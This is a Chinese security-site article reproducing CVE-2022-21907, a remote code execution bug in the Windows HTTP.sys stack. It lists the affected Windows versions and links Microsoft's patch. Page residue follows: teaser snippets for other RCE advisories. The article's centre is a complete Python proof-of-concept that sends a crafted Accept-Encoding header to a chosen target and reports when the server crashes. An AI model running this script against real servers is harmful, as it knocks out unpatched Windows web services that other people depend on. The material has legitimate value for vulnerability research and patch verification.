HTTP协议栈远程代码执行漏洞(CVE-2022-21907)复现

VSole2022-01-25 07:31:03
文章来源:洛米唯熊

0x00 漏洞概述

  HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈(HTTP.sys)中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。

    未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包,触发缓冲区溢出,从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”,无需用户交互,便可通过网络进行自我传播。

CVSS评分为9.8

0x01 影响范围


Windows Server 2019 (Server Core installation)Windows Server 2019Windows 10 Version 21H2 for ARM64-based SystemsWindows 10 Version 21H2 for 32-bit SystemsWindows 11 for ARM64-based SystemsWindows 11 for x64-based SystemsWindows Server, version 20H2 (Server Core Installation)Windows 10 Version 20H2 for ARM64-based SystemsWindows 10 Version 20H2 for 32-bit SystemsWindows 10 Version 20H2 for x64-based SystemsWindows Server 2022 (Server Core installation)Windows Server 2022Windows 10 Version 21H1 for 32-bit SystemsWindows 10 Version 21H1 for ARM64-based SystemsWindows 10 Version 21H1 for x64-based SystemsWindows 10 Version 21H2 for x64-based SystemsWindows 10 Version 1809 for ARM64-based SystemsWindows 10 Version 1809 for x64-based SystemsWindows 10 Version 1809 for 32-bit Systems

0x02 漏洞复现


#!/usr/bin/env python3# -*- coding: utf-8 -*-# File name          : CVE-2022-21907_http.sys_crash.py# Author             : Podalirius (@podalirius_)# Date created       : 13 Jan 2022
import argparseimport datetimeimport requestsimport timeimport threading
def parseArgs():    parser = argparse.ArgumentParser(description="Description message")    parser.add_argument("-t", "--target", default=None, required=True, help='Target IIS Server.')    parser.add_argument("-v", "--verbose", default=False, action="store_true", help='Verbose mode. (default: False)')    return parser.parse_args()
def monitor_thread(target, dtime=5):    print('[>] Started monitoring of target server for the next %d seconds.' % dtime)    for k in range(dtime):        try:            r = requests.get(target, timeout=1)        except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:            print("   [%s] \x1b[1;91mTarget is down!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))        else:            print("   [%s] \x1b[1;92mTarget is reachable!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))            time.sleep(1)
if __name__ == '__main__':    options = parseArgs()
    if not options.target.startswith('http://') and not options.target.startswith('https://'):        target = "http://" + options.target    else:        target = options.target
    payload = 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
    # Starting monitoring thread    t = threading.Thread(target=monitor_thread, args=(target,))    t.start()    time.sleep(2)
    # Sending payload    print("   [+] Sending payload ...")    try:        r = requests.get(target, headers={"Accept-Encoding": payload}, timeout=15)    except (requests.exceptions.ReadTimeout, requests.exceptions.ConnectTimeout) as e:        t.join()        print("[%s] \x1b[1;91mTarget successfully crashed!\x1b[0m" % datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
    # Cleanup    t.join()

0x03 修复方案

    官方已发布受影响版本的对应补丁,建议受影响的用户及时更新官方的安全补丁。链接如下:

    https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907


远程代码执行漏洞target
本作品采用《CC 协议》,转载必须注明作者和本文链接
0x01 漏洞概述IBM WebSphere Application Server在今年6月发布了一则漏洞通告,cve编号为:CVE-2020-4450。该漏洞允许攻击者通过iiop向WAS进行网络请求,最终在WAS上执行任意代码。
研究人员报告说,Slack修补了一个严重的远程代码执行漏洞,该漏洞可能使攻击者能够在其协作软件的桌面版本中执行任意代码。Evolution Gaming的安全工程师Oskars Vegeris发现了该漏洞,并于2020年1月通过HackerOne与Slack私下共享。Slack在2月发布了该漏洞的初步修复程序。Vegeris说,这个问题存在于制作Slack post的方式上。敦促Slack用户将其桌面应用程序更新到版本 ,以修复该漏洞。安全研究的价值 200亿美元的公司 Slack 的价值研究通过其漏洞赏金计划向Vegeris仅支付了1,750美元用于RCE漏洞
文章来源:洛米唯熊0x00?HTTP协议堆栈中存在远程代码执行漏洞,由于HTTP协议栈中的HTTP Trailer Support功能存在边界错误可导致缓冲区溢出。????未经身份验证的攻击者通过向Web服务器发送特制的HTTP数据包,触发缓冲区溢出,从而在目标系统上执行任意代码。该漏洞被微软提示为“可蠕虫化”,无需用户交互,便可通过网络进行自我传播。
近日,SolarWinds发布安全公告,修复了Serv-U中存在远程代码执行漏洞漏洞CVE编号:CVE-2021-35211。该漏洞为微软发现在野利用后向SolarWinds报告,并提供了有限漏洞利用的概念证明。未授权的攻击者可利用该漏洞在目标服务器上执行任意代码,最终导致服务器被控制。目前官方已发布安全版本修复该漏洞,建议受影响用户及时升级至安全版本进行防护,做好资产自查以及预防工作,以免遭受
奇安信CERT致力于第一时间为企业级用户提供安全风险通告和有效解决方案。风险通告Oracle WebLogi
Bleeping Computer 网站披露, WordPress 插件 Tatsu Builder 中存在远程代码执行漏洞 CVE-2021-25094,黑客正在利用其进行大规模网络攻击。(该插件安装在大约 10 万个网站上。)
部分getshell漏洞汇总
2022-07-20 10:12:45
即可未授权访问console后台,但是权限比较低备注:此处会出现个问题,在复现的环境中直接拼接
最近海康威视又一次因自身的漏洞被黑客利用而遭受攻击。
域渗透重要漏洞汇总
VSole
网络安全专家